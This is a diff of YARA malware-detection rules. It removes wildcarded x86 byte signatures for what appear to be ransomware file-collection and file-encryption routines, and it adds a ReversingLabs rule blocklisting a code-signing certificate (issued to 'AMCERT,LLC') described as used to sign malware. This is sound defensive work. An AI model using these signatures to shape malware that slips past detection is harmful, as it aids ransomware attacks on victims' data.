-            ?? 85 C0 74 ?? FF 76 ?? 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 57 E8 ?? ?? ?? ??
-            83 C4 ?? EB ?? 8B 74 24 ?? F0 FF 86 ?? ?? ?? ?? 7F ?? E9 ?? ?? ?? ?? 8B 74 24 ?? F0
-            FF 06 0F 8E ?? ?? ?? ?? 89 5C 24 ?? 89 74 24 ?? FF 75 ?? 8D BC 24 ?? ?? ?? ?? 57 E8
-            ?? ?? ?? ?? 83 C4 ?? 57 56 53 FF 75 ?? FF 75 ?? FF 74 24 ?? FF 74 24 ?? 8D 84 24 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 84 24 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B
-            84 24 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 50 FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            8B 44 24 ?? 85 C0 74 ?? 6A ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 84 24 ?? ??
-            ?? ?? F0 FF 08 0F 85 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 DF 89 D6 F3 A5 53 E8 ?? ?? ?? ?? 83 C4 ?? 09 D0 0F 84
-            ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 74 ?? 52 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 31 DB 83 7C 24 ?? ?? 75 ?? 8B
-            5C 24 ?? 8B 7C 24 ?? EB ?? 8B BC 24 ?? ?? ?? ?? 31 DB 85 DB B8 ?? ?? ?? ?? 89 BC 24
-            ?? ?? ?? ?? 0F 44 FB 0F 44 D8 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 52 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 52 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            83 7C 24 ?? ?? 8B 4C 24 ?? 0F 85 ?? ?? ?? ?? 8B 74 24 ?? 89 C8 83 F8 ?? 0F 82 ?? ??
-            ?? ?? 89 4C 24 ?? 8B 0E BA ?? ?? ?? ?? 31 D1 0F B6 56 ?? 83 F2 ?? 09 CA 0F 85 ?? ??
-            ?? ?? 83 C0 ?? 8D 4E ?? 50 51 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 80 7C 24
-        }
-		$collect_files_recursively_p4 = {
-            0F 85 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 89 C1 85 C0 74 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 50 51 89 4C 24 ?? E8 ??
-            ?? ?? ?? 8B 0C 24 89 44 24 ?? 51 E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 74 ?? 81 7C 24 ?? ??
-            ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 52 50 8D 44 24 ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7C 24 ?? ?? 8B 4C 24 ?? 8B 54 24 ?? B8 ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F 45 C8 B8 ??
-            ?? ?? ?? 0F 45 D0 8D 84 24 ?? ?? ?? ?? 89 0C 24 89 44 24 ?? 8D 44 24 ?? 89 54 24 ??
-            C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 8B 0C 24 8B 54 24 ?? 89 44 24 ?? 8B 44 24
-            ?? 89 54 24 ?? 89 84 24 ?? ?? ?? ?? 89 C8 29 D0 BA ?? ?? ?? ?? 72 ?? 03 44 24 ?? FF
-            74 24 ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 8B 54 24 ?? 85 C0 B8 ??
-            ?? ?? ?? 0F 45 D0 8B 84 24 ?? ?? ?? ?? 89 54 24 ?? 85 C0 74 ?? 6A ?? 50 FF 74 24 ??
-            E8 ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? 83 C4 ?? 89 C8 29 D0 89 44 24 ?? 50 8B 44 24
-            ?? 50 51 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 84 24 ?? ?? ?? ??
-            3C ?? 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 8B 7C 24 ?? BE ?? ?? ?? ?? 39 04 24 74 ?? 85 FF
-            0F 88 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F B6 00 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 89 C6 85
-            C0 0F 84 ?? ?? ?? ?? 57 FF 74 24 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 74 24 ?? 89 7C 24
-            ?? 89 7C 24 ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4
-        }
-		$collect_files_recursively_p5 = {
-            8B 7C 24 ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 74 24 ?? 56 E8
-            ?? ?? ?? ?? 83 C4 ?? 56 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ??
-            ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 74 24 ?? 85 DB 89 44 24 ?? 89 0C 24 74 ?? 6A ??
-            53 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? EB ?? 31 C0 BE ?? ?? ?? ?? 83 F8 ?? 0F 83 ?? ?? ?? ?? 89 44
-            24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ??
-            ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F2 0F 10 44 24 ?? 8B 44
-            24 ?? F2 0F 11 44 24 ?? 39 C7 89 44 24 ?? 8B 4C 24 ?? 89 0C 24 75 ?? 57 FF 74 24 ??
-            53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 7C 24 ?? ?? 75 ?? 8B 06 8B 76 ?? B9 ?? ??
-            ?? ?? BA ?? ?? ?? ?? 31 C8 31 D6 09 C6 74 ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            52 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B 5C
-            24 ?? 8B 7C 24 ?? 85 FF 0F 84 ?? ?? ?? ?? 0F 88 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F B6 00
-            6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 89 C6 85 C0 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 44
-        }
-		$collect_files_recursively_p6 = {
-            24 ?? 85 C0 74 ?? 6A ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 66 2E 0F 1F 84 00 ??
-            ?? ?? ?? 0F 1F 44 00 ?? 8B 84 24 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 50 FF 74 24 ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 85 C0 74 ?? 6A ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 84 24 ?? ?? ?? ?? F0 FF 08 0F 85 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 31 FF BB ?? ?? ?? ?? 85 FF 0F 85 ?? ?? ?? ?? BE ?? ??
-            ?? ?? 57 89 5C 24 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 74 24 ?? 89 7C 24 ?? 89 7C 24
-            ?? 6A ?? 57 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 8B 74 24 ?? 66 C7 44
-            30 ?? ?? ?? C7 04 30 ?? ?? ?? ?? 8B 45 ?? 83 C6 ?? F2 0F 10 44 24 ?? 89 74 24 ?? 8B
-            08 8B 58 ?? F2 0F 11 44 24 ?? 8B 44 24 ?? 89 4C 24 ?? 29 F0 39 D8 73 ?? 53 56 8D 44
-            24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 74 24 ?? 8B 44 24 ?? 01 F0 53 FF 74 24 ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? F2 0F 10 44 24 ?? 01 DE 89 B4 24 ?? ?? ?? ?? F2 0F 11 84 24 ??
-            ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 56 53 57 FF 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 0F B6 84 24 ?? ?? ?? ?? 3C ?? 88 44 24 ?? 0F 85 ?? ?? ?? ?? 8D 84 24
-            ?? ?? ?? ?? 50 8D 44 24 ?? 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 7C 24 ?? 85
-            FF 0F 84 ?? ?? ?? ?? 8B 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 5C 24 ?? 53 E8 ?? ?? ?? ?? 83
-            C4 ?? 53 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 44
-            24 ?? 8B 4C 24 ?? 8B 5C 24 ?? 85 F6 89 44 24 ?? 89 4C 24 ?? 74 ?? 6A ?? 56 57 E8 ??
-            ?? ?? ?? 83 C4 ?? 85 DB 74 ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 85 C0 74 ?? 6A ??
-            50 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 85 C0 74 ?? 6A ?? 50 FF 74 24
-        }
-		$encrypt_files_full_v1_p1 = {
-            55 89 E5 53 57 56 83 E4 ?? 81 EC ?? ?? ?? ?? 89 54 24 ?? 89 4C 24 ?? 6A ?? 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 89 C7 89 44 24 ??
-            0F 85 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 47 ?? 89 44 24 ?? EB ?? 66 2E 0F
-            1F 84 00 ?? ?? ?? ?? 0F 1F 44 00 ?? 8B 06 01 F8 53 FF 74 24 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 01 DF 89 7E ?? 8B 7C 24 ?? 68 ?? ?? ?? ?? 57 FF 74 24 ?? 8D 44 24 ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 0F B6 44 24 ?? 3C ?? 0F 85 ?? ?? ?? ?? 8B 74 24 ?? 85 F6 0F 84 ??
-            ?? ?? ?? 8B 45 ?? 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 55 ?? F2 0F 10 40 ?? F3 0F 7E 48 ?? F2
-            0F 11 41 ?? F2 0F 10 40 ?? 66 0F D6 49 ?? F2 0F 11 41 ?? F2 0F 10 00 8B 42 ?? F2 0F
-            11 01 F3 0F 7E 02 89 44 24 ?? A1 ?? ?? ?? ?? 66 0F D6 44 24 ?? 0F B6 00 3C ?? 75 ??
-            E8 ?? ?? ?? ?? F2 0F 10 44 24 ?? F3 0F 7E 4C 24 ?? 8B 44 24 ?? 0F B6 5C 24 ?? 0F B7
-            54 24 ?? 81 FE ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10
-            44 24 ?? 66 0F D6 8C 24 ?? ?? ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24 ?? F2
-            0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24 ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24
-            ?? F2 0F 11 44 24 ?? F3 0F 7E 44 24 ?? 89 41 ?? 66 0F D6 41 ?? C7 41 ?? ?? ?? ?? ??
-            C7 01 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7
-            41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7
-            41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7
-            41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 88 59 ?? 66 89 51 ?? C7
-            84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 89 F0 89 7C
-        }
-		$encrypt_files_full_v1_p2 = {
-            24 ?? 89 7C 24 ?? C1 E8 ?? 89 44 24 ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? 89 F3 83 E3 ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F B6 00 3C ?? 75 ?? 8D 4C
-            24 ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 44 00 ?? F3 0F 6F 64
-            24 ?? F3 0F 6F 94 24 ?? ?? ?? ?? F3 0F 6F 84 24 ?? ?? ?? ?? F3 0F 6F BC 24 ?? ?? ??
-            ?? B8 ?? ?? ?? ?? 66 0F 6F F4 66 0F 6F DA 66 0F 6F E8 66 0F 7F 7C 24 ?? 0F 1F 84 00
-            ?? ?? ?? ?? 66 0F FE F3 48 66 0F EF EE 66 0F 6F CD 66 0F 72 F5 ?? 66 0F 72 D1 ?? 66
-            0F EB E9 66 0F FE FD 66 0F EF DF 66 0F 6F CB 66 0F 72 F3 ?? 66 0F 72 D1 ?? 66 0F EB
-            D9 66 0F FE F3 66 0F EF EE 66 0F 70 F6 ?? 66 0F 6F CD 66 0F 72 F5 ?? 66 0F 72 D1 ??
-            66 0F EB E9 66 0F FE FD 66 0F 70 ED ?? 66 0F EF DF 66 0F 70 FF ?? 66 0F 6F CB 66 0F
-            72 F3 ?? 66 0F 72 D1 ?? 66 0F EB D9 66 0F FE F3 66 0F EF EE 66 0F 6F CD 66 0F 72 F5
-            ?? 66 0F 72 D1 ?? 66 0F EB E9 66 0F FE FD 66 0F EF DF 66 0F 6F CB 66 0F 72 F3 ?? 66
-            0F 72 D1 ?? 66 0F EB D9 66 0F FE F3 66 0F EF EE 66 0F 70 F6 ?? 66 0F 6F CD 66 0F 72
-            F5 ?? 66 0F 72 D1 ?? 66 0F EB E9 66 0F FE FD 66 0F 70 ED ?? 66 0F EF DF 66 0F 70 FF
-            ?? 66 0F 6F CB 66 0F 72 F3 ?? 66 0F 72 D1 ?? 66 0F EB D9 0F 85 ?? ?? ?? ?? 66 0F FE
-            7C 24 ?? 66 0F 7E C0 66 0F FE F4 66 0F FE DA 66 0F FE E8 40 F3 0F 7F B4 24 ?? ?? ??
-            ?? F3 0F 7F 9C 24 ?? ?? ?? ?? F3 0F 7F BC 24 ?? ?? ?? ?? F3 0F 7F AC 24 ?? ?? ?? ??
-            89 84 24 ?? ?? ?? ?? 89 F2 31 C9 83 E2 ?? 83 FB ?? 8D 04 17 0F 82 ?? ?? ?? ?? 31 C9
-        }
-		$encrypt_files_full_v1_p3 = {
-            83 FB ?? 72 ?? 03 54 24 ?? 89 F7 89 D9 83 E7 ?? 89 7C 24 ?? 29 F9 31 FF 66 2E 0F 1F
-            84 00 ?? ?? ?? ?? 66 90 F3 0F 6F 44 3A ?? F3 0F 6F 94 3C ?? ?? ?? ?? F3 0F 6F 0C 3A
-            F3 0F 6F 9C 3C ?? ?? ?? ?? 66 0F EF D0 66 0F EF D9 F3 0F 7F 54 3A ?? F3 0F 7F 1C 3A
-            83 C7 ?? 39 F9 75 ?? 8B 54 24 ?? 85 D2 74 ?? 83 FA ?? 72 ?? 89 F2 89 CF 89 D9 83 E2
-            ?? 29 D1 90 F3 0F 7E 04 38 F3 0F 7E 8C 3C ?? ?? ?? ?? 66 0F EF C8 66 0F D6 0C 38 83
-            C7 ?? 39 F9 75 ?? 85 D2 74 ?? 66 2E 0F 1F 84 00 ?? ?? ?? ?? 0F 1F 40 ?? 0F B6 94 0C
-            ?? ?? ?? ?? 30 14 08 41 39 CB 75 ?? 88 9C 24 ?? ?? ?? ?? 89 F3 8B 74 24 ?? 8B 46 ??
-            8B 7E ?? 29 F8 39 D8 0F 87 ?? ?? ?? ?? 53 8B 7C 24 ?? 57 56 8D 44 24 ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 0F B6 44 24 ?? 3C ?? 0F 84 ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? 89 54
-            24 ?? 89 4C 24 ?? 88 44 24 ?? A1 ?? ?? ?? ?? 0F B6 00 6A ?? 6A ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 0F 84 ?? ?? ?? ?? F2 0F 10 44 24 ?? 89 C7 BB ?? ?? ?? ?? F2 0F 11 00 EB
-            ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 57 FF 74 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 44 24
-            ?? 3C ?? 75 ?? 83 7C 24 ?? ?? 74 ?? BB ?? ?? ?? ?? BF ?? ?? ?? ?? EB ?? 3C ?? 75 ??
-            8B 5C 24 ?? 8B 73 ?? 8B 3B 8B 06 57 FF D0 83 C4 ?? 8B 46 ?? 85 C0 74 ?? FF 76 ?? 50
-            57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 31 FF 6A ?? 68 ??
-            ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 F8 89 DA 8D 65 ?? 5E 5F 5B 5D C3
-        }
-		$encrypt_files_full_v2_p1 = {
-            55 89 E5 53 57 56 83 E4 ?? 81 EC ?? ?? ?? ?? 89 D7 89 4C 24 ?? 6A ?? 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 89 C3 89 44 24 ?? 0F 85
-            ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 43 ?? 89 7C 24 ?? 89 44 24 ?? EB ?? 66
-            2E 0F 1F 84 00 ?? ?? ?? ?? 0F 1F 00 8B 06 01 F8 53 FF 74 24 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 01 DF 8B 5C 24 ?? 89 7E ?? 89 F7 68 ?? ?? ?? ?? 53 FF 74 24 ?? 8D 44 24 ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 44 24 ?? 3C ?? 0F 85 ?? ?? ?? ?? 8B 74 24 ?? 85 F6 0F
-            84 ?? ?? ?? ?? 8B 45 ?? 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 55 ?? F2 0F 10 40 ?? F3 0F 7E 48
-            ?? F2 0F 11 41 ?? F2 0F 10 40 ?? 66 0F D6 49 ?? F2 0F 11 41 ?? F2 0F 10 00 8B 42 ??
-            F2 0F 11 01 F3 0F 7E 02 89 44 24 ?? A1 ?? ?? ?? ?? 66 0F D6 44 24 ?? 0F B6 00 3C ??
-            75 ?? E8 ?? ?? ?? ?? F2 0F 10 44 24 ?? F3 0F 7E 4C 24 ?? 8B 44 24 ?? 8D 8C 24 ?? ??
-            ?? ?? 0F B7 54 24 ?? 81 FE ?? ?? ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24 ??
-            66 0F D6 8C 24 ?? ?? ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24 ?? F2 0F 11 84
-            24 ?? ?? ?? ?? F2 0F 10 44 24 ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24 ?? F2 0F
-            11 44 24 ?? 89 41 ?? F3 0F 7E 44 24 ?? 0F B6 44 24 ?? 66 0F D6 41 ?? C7 41 ?? ?? ??
-            ?? ?? C7 01 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ??
-            ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ??
-            ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ??
-            ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 88 41 ?? 66 89 51
-            ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 89 F0
-        }
-		$encrypt_files_full_v2_p2 = {
-            89 5C 24 ?? 89 5C 24 ?? C1 E8 ?? 89 44 24 ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 89 F3 83 E3 ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F B6 00 3C ?? 75 ??
-            8D 4C 24 ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 00 F3 0F 6F 64
-            24 ?? F3 0F 6F 94 24 ?? ?? ?? ?? F3 0F 6F 84 24 ?? ?? ?? ?? F3 0F 6F BC 24 ?? ?? ??
-            ?? B8 ?? ?? ?? ?? 66 0F 6F F4 66 0F 6F DA 66 0F 6F E8 66 0F 7F 7C 24 ?? 0F 1F 84 00
-            ?? ?? ?? ?? 66 0F FE F3 48 66 0F EF EE 66 0F 6F CD 66 0F 72 F5 ?? 66 0F 72 D1 ?? 66
-            0F EB E9 66 0F FE FD 66 0F EF DF 66 0F 6F CB 66 0F 72 F3 ?? 66 0F 72 D1 ?? 66 0F EB
-            D9 66 0F FE F3 66 0F EF EE 66 0F 70 F6 ?? 66 0F 6F CD 66 0F 72 F5 ?? 66 0F 72 D1 ??
-            66 0F EB E9 66 0F FE FD 66 0F 70 ED ?? 66 0F EF DF 66 0F 70 FF ?? 66 0F 6F CB 66 0F
-            72 F3 ?? 66 0F 72 D1 ?? 66 0F EB D9 66 0F FE F3 66 0F EF EE 66 0F 6F CD 66 0F 72 F5
-            ?? 66 0F 72 D1 ?? 66 0F EB E9 66 0F FE FD 66 0F EF DF 66 0F 6F CB 66 0F 72 F3 ?? 66
-            0F 72 D1 ?? 66 0F EB D9 66 0F FE F3 66 0F EF EE 66 0F 70 F6 ?? 66 0F 6F CD 66 0F 72
-            F5 ?? 66 0F 72 D1 ?? 66 0F EB E9 66 0F FE FD 66 0F 70 ED ?? 66 0F EF DF 66 0F 70 FF
-            ?? 66 0F 6F CB 66 0F 72 F3 ?? 66 0F 72 D1 ?? 66 0F EB D9 0F 85 ?? ?? ?? ?? 66 0F FE
-            7C 24 ?? 66 0F 7E C0 66 0F FE F4 66 0F FE DA 66 0F FE E8 40 F3 0F 7F B4 24 ?? ?? ??
-            ?? F3 0F 7F 9C 24 ?? ?? ?? ?? F3 0F 7F BC 24 ?? ?? ?? ?? F3 0F 7F AC 24 ?? ?? ?? ??
-            89 84 24 ?? ?? ?? ?? 8B 44 24 ?? 89 F2 31 C9 83 E2 ?? 83 FB ?? 8D 04 10 0F 82 ?? ??
-            ?? ?? 31 C9 83 FB ?? 72 ?? 03 54 24 ?? 89 F7 89 D9 83 E7 ?? 89 7C 24 ?? 29 F9 31 FF
-        }
-		$encrypt_files_full_v2_p3 = {
-            0F 1F 84 00 ?? ?? ?? ?? F3 0F 6F 44 3A ?? F3 0F 6F 94 3C ?? ?? ?? ?? F3 0F 6F 0C 3A
-            F3 0F 6F 9C 3C ?? ?? ?? ?? 66 0F EF D0 66 0F EF D9 F3 0F 7F 54 3A ?? F3 0F 7F 1C 3A
-            83 C7 ?? 39 F9 75 ?? 8B 54 24 ?? 8B 7C 24 ?? 85 D2 74 ?? 83 FA ?? 72 ?? 89 F2 89 CF
-            89 D9 83 E2 ?? 29 D1 66 2E 0F 1F 84 00 ?? ?? ?? ?? 0F 1F 00 F3 0F 7E 04 38 F3 0F 7E
-            8C 3C ?? ?? ?? ?? 66 0F EF C8 66 0F D6 0C 38 83 C7 ?? 39 F9 75 ?? 8B 7C 24 ?? 85 D2
-            74 ?? 66 2E 0F 1F 84 00 ?? ?? ?? ?? 0F B6 94 0C ?? ?? ?? ?? 30 14 08 41 39 CB 75 ??
-            88 9C 24 ?? ?? ?? ?? 89 F3 8B 47 ?? 89 FE 8B 7F ?? 29 F8 39 D8 0F 87 ?? ?? ?? ?? 53
-            8B 5C 24 ?? 53 56 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 44 24 ?? 89 F7 3C ??
-            0F 84 ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? 89 54 24 ?? 89 4C 24 ?? 88 44 24 ?? A1 ??
-            ?? ?? ?? 0F B6 00 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? F2 0F
-            10 44 24 ?? 89 C7 BB ?? ?? ?? ?? F2 0F 11 00 EB ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 53 FF
-            74 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 44 24 ?? 3C ?? 75 ?? 83 7C 24 ?? ?? 74 ??
-            BB ?? ?? ?? ?? BF ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 8B 5C 24 ?? 8B 73 ?? 8B 3B 8B 06 57
-            FF D0 83 C4 ?? 8B 46 ?? 85 C0 74 ?? FF 76 ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A
-            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 31 FF 6A ?? 68 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ??
-            83 C4 ?? 89 F8 89 DA 8D 65 ?? 5E 5F 5B 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and ( pe.signatures [ i ] . serial == "00:bc:6a:18:12:e0:01:36:24:69:54:11:08:97:3b:bd:52" or pe.signatures [ i ] . serial == "bc:6a:18:12:e0:01:36:24:69:54:11:08:97:3b:bd:52" ) and 1623801600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_Bde1D6Dc3622724F427A39E6A34F5124 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "6b6958c0-3b43-5c17-9354-d0e2326b97fd"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12350-L12368"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "f1cf0b6855269a771447a0b38f4a02996b6527d7df4b143b69598ed591719ca0"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $collect_files_recursively_p* ) ) and ( $get_valid_drives ) and ( ( ( all of ( $encrypt_files_full_v1_p* ) ) ) or ( ( all of ( $encrypt_files_full_v2_p* ) ) ) )
